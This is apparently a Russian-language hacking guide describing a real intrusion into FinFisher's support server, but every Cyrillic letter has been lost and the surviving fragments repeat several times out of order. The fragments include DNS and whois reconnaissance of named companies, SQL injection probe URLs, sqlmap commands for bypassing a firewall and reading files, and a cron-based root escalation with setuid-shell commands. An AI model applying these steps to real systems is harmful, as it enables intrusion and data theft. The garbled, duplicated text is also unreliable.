   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

